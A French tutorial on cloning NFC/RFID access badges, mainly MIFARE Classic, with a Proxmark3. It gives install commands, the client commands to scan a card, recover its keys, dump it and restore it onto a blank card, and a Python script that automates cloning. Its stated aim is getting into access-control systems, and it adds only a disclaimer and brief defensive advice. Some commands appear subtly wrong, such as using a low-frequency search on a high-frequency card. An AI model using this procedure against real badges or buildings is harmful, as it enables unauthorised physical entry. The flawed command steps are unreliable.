⚠️ Avertissement
Ce tutoriel est fourni à des fins éducatives uniquement. L’utilisation de ces techniques sans autorisation explicite pour manipuler ou cloner des badges NFC/RFID est illégale et peut entraîner des poursuites judiciaires. Utilisez ces techniques uniquement dans le cadre de tests de sécurité légitimes pour renforcer la sécurité des systèmes de contrôle d’accès.
Extraction de Données NFC avec Proxmark3
Objectif
Utiliser le Proxmark3 pour cloner et manipuler des badges NFC/RFID en vue d'accéder à des systèmes de contrôle d’accès ou d’acquérir des informations sur des dispositifs NFC/RFID.
Prérequis
- Matériel : Proxmark3 (modèle RDV4 de préférence) et un ordinateur avec Kali Linux ou un système Linux similaire.
- Logiciel : Proxmark3 client installé sur Kali Linux.
- Connaissances requises : Notions de base sur le protocole NFC/RFID et les systèmes de contrôle d’accès.
Tutoriel détaillé
1. Installation et Configuration du Proxmark3
- Connecter le Proxmark3 à l’ordinateur via USB.
- Installer les dépendances nécessaires sur Kali Linux (si non déjà installé) :
sudo apt-get update
sudo apt-get install proxmark3
git clone https://github.com/RfidResearchGroup/proxmark3.git
cd proxmark3
make clean && make all
sudo ./pm3-flash-all
2. Lancement de l'Interface Client Proxmark3
Une fois le Proxmark3 configuré, lancez l’interface client :
sudo ./proxmark3 /dev/ttyACM0
/dev/ttyACM0 est l’emplacement typique pour le Proxmark3. Vérifiez avec dmesg si nécessaire pour trouver le bon chemin.
3. Scannage des Badges NFC/RFID
Placez le badge à cloner sur le Proxmark3 et utilisez la commande suivante pour scanner la carte :
lf search
Cela va chercher les informations sur la carte/badge. Vous verrez des détails comme le type de carte (ex. : MIFARE Classic), l’identifiant, et d’autres informations.
4. Clonage d’un Badge NFC (Ex. : MIFARE Classic)
Si c'est une carte MIFARE, lancez la commande suivante pour récupérer les clés d’accès de chaque secteur :
hf mf mifare
Pour copier la carte une fois les clés récupérées :
hf mf dump
Sauvegardez le dump avec un nom précis :
hf mf save mybadge.bin
5. Écriture du Badge Cloné sur une Carte Vierge
Utilisez une carte vierge compatible et placez-la sur le Proxmark3. Chargez ensuite le dump précédemment enregistré :
hf mf restore mybadge.bin
Cette opération va écrire les informations clonées sur la carte vierge, rendant cette dernière identique à la carte originale.
6. Exploitation et Tests
- Une fois le badge cloné, testez-le sur le système de contrôle d’accès d’origine pour vérifier son efficacité.
- Assurez-vous que toutes les informations critiques (secteurs, blocs, UID) sont identiques à l’original.
7. Sécurisation et Bonnes Pratiques
- Si le but est de sécuriser des infrastructures, utilisez ces techniques pour tester la robustesse de votre système de contrôle d'accès.
- Utilisez des badges supportant des technologies plus sécurisées que les cartes MIFARE classiques (ex. : DESFire EV1/EV2).
Script Python pour Automatisation des Tâches
Nous pouvons créer un script Python pour automatiser la lecture, le clonage, et l’écriture de badges avec le Proxmark3 en utilisant l’interface CLI.
import os
def scan_badge():
print("Scanning for badges...")
os.system("proxmark3 /dev/ttyACM0 'lf search'")
def dump_badge(filename):
print(f"Dumping badge data to {filename}...")
os.system(f"proxmark3 /dev/ttyACM0 'hf mf dump' > {filename}")
def clone_badge(filename):
print(f"Cloning badge from {filename}...")
os.system(f"proxmark3 /dev/ttyACM0 'hf mf restore {filename}'")
if __name__ == "__main__":
print("NFC Badge Cloner with Proxmark3")
scan_badge()
dump_filename = "mybadge.bin"
dump_badge(dump_filename)
clone_badge(dump_filename)
print("Badge cloning completed.")
Validation et Compatibilité
Tester sur différents types de badges NFC/RFID pour s'assurer que le script et la procédure fonctionnent bien sur les modèles communément utilisés (MIFARE, HID iCLASS, etc.).